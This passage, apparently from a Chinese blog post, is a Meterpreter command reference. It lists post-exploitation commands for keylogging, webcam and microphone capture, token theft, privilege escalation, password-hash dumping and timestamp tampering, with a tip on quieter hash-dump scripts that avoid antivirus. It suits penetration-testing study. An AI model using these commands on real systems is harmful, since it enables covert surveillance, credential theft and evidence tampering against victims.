reboot      - reboot the victim's computer
reg         - interact with the victim's registry
rev2self    - call RevertToSelf() on the victim machine
shell       - open a shell on the remote machine
shutdown    - shut down the remote machine
steal_token - attempt to steal the token of the process with the given PID
suspend     - suspend or resume a list of processes
sysinfo     - get information about the remote system, such as the OS

UI commands

enumdesktops    - list all accessible desktops and window stations
getdesktop      - get the current Meterpreter desktop
idletime        - show how long the victim's user has been idle
keyboard_send   - send keystrokes
keyevent        - send key events
keyscan_dump    - dump the keystroke buffer
keyscan_start   - start capturing keystrokes
keyscan_stop    - stop capturing keystrokes
mouse           - send mouse events
screenshare     - watch the remote user's desktop in real time
screenshot      - grab a screenshot of the interactive desktop
setdesktop      - change Meterpreter's current desktop
uictl           - control some of the user interface components

camera commands

record_mic      - record audio from the default microphone for X seconds
webcam_chat     - start a video chat
webcam_list     - list webcams
webcam_snap     - take a snapshot from the specified webcam
webcam_stream   - stream video from the specified webcam

Audio output command

play    - play a waveform audio file (.wav) on the target system

privilege escalation

getsystem   - attempt to elevate to SYSTEM using the built-in techniques (named-pipe impersonation, token duplication); it needs an administrator session to start from

password dump command

hashdump    - dump the password hashes from the SAM; requires SYSTEM (run getsystem first)
hashdump can get past some antivirus, but there are two scripts that are quieter: "run hashdump" and "run smart_hashdump" (today the post modules post/windows/gather/hashdump and post/windows/gather/smart_hashdump, the latter choosing the extraction method based on privileges and OS).

Timestomp

timestomp   - manipulate a file's MACE attributes
Modified: last modification time
Accessed: last access time
Created: creation time
Entry Modified: MFT entry modification time

Origin blog.csdn.net/weixin_44971640/article/details/128450689